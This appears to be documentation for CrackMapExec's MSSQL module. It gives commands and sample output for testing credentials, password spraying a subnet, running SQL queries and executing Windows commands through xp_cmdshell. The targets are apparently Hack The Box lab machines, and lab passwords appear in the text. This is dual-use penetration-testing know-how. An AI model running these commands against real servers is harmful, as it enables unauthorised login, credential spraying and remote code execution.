MSSQL Command Reference

MSSQL : Command Reference

Updated: 04/28/20
CME Version:5.0.1dev

---

Testing credentials

You can use two methods to authenticate to the MSSQL: windows or normal (default: windows). To use local auth, add the following flag -a normal

1. Windows auth

1. With SMB port open

#~ cme mssql 10.10.10.52 -u james -p 'J@m3s_P@ssW0rd!'

2. With SMB port close, add the flag -d DOMAIN

#~ cme mssql 10.10.10.52 -u james -p 'J@m3s_P@ssW0rd!' -d HTB

Expected Results:

MSSQL       10.10.10.52     1433   MANTIS           [+] HTB\james:J@m3s_P@ssW0rd! 

2. Local auth

#~ cme mssql 10.10.10.52 -u admin -p 'm$$ql_S@_P@ssW0rd!' -a normal

Expected Results:

MSSQL       10.10.10.52     1433   None             [+] admin:m$$ql_S@_P@ssW0rd! (Pwn3d!)

Specify Ports

#~ cme mssql 10.10.10.52 -u admin -p 'm$$ql_S@_P@ssW0rd!' -a normal --port 1434

Password spraying (without bruteforce)

#~ cme mssql 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce

Expected Results:

MSSQL       10.10.10.59     1433   None             [-] ERROR(TALLY): Line 1: Login failed for user 'test1'.
MSSQL       10.10.10.59     1433   None             [+] sa:password (Pwn3d!)

Note: By default CME will exit after a successful login is found. Using the --continue-on-success flag will continue spraying even after a valid password is found. Usefull for spraying a single password against a large user list.

---

Execute MSSQL command

cme mssql 10.10.10.52 -u admin -p 'm$$ql_S@_P@ssW0rd!' -a normal -q 'SELECT name FROM master.dbo.sysdatabases;'

Expected Results:

MSSQL       10.10.10.52     1433   None             [+] admin:m$$ql_S@_P@ssW0rd! (Pwn3d!)
MSSQL       10.10.10.52     1433   None             name
MSSQL       10.10.10.52     1433   None             --------------------------------------------------------------------------------------------------------------------------------
MSSQL       10.10.10.52     1433   None             master
MSSQL       10.10.10.52     1433   None             tempdb
MSSQL       10.10.10.52     1433   None             model
MSSQL       10.10.10.52     1433   None             msdb
MSSQL       10.10.10.52     1433   None             orcharddb

---

Execute Windows Command

This option use xp_cmdshell to exec command on the remote host.

#~ cme mssql 10.10.10.59 -u sa -p 'GWE3V65#6KFH93@4GWTG2G' -a normal -x whoami
MSSQL       10.10.10.59     1433   None             [+] sa:GWE3V65#6KFH93@4GWTG2G (Pwn3d!)
MSSQL       10.10.10.59     1433   None             [+] Executed command via mssqlexec
MSSQL       10.10.10.59     1433   None             --------------------------------------------------------------------------------
MSSQL       10.10.10.59     1433   None             tally\sarah

If permission is DENIED:

MSSQL       10.10.10.52     1433   None             [+] admin:m$$ql_S@_P@ssW0rd! (Pwn3d!)
MSSQL       10.10.10.52     1433   None             [-] ERROR(MANTIS\SQLEXPRESS): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.
MSSQL       10.10.10.52     1433   None             [+] Executed command via mssqlexec
MSSQL       10.10.10.52     1433   None             None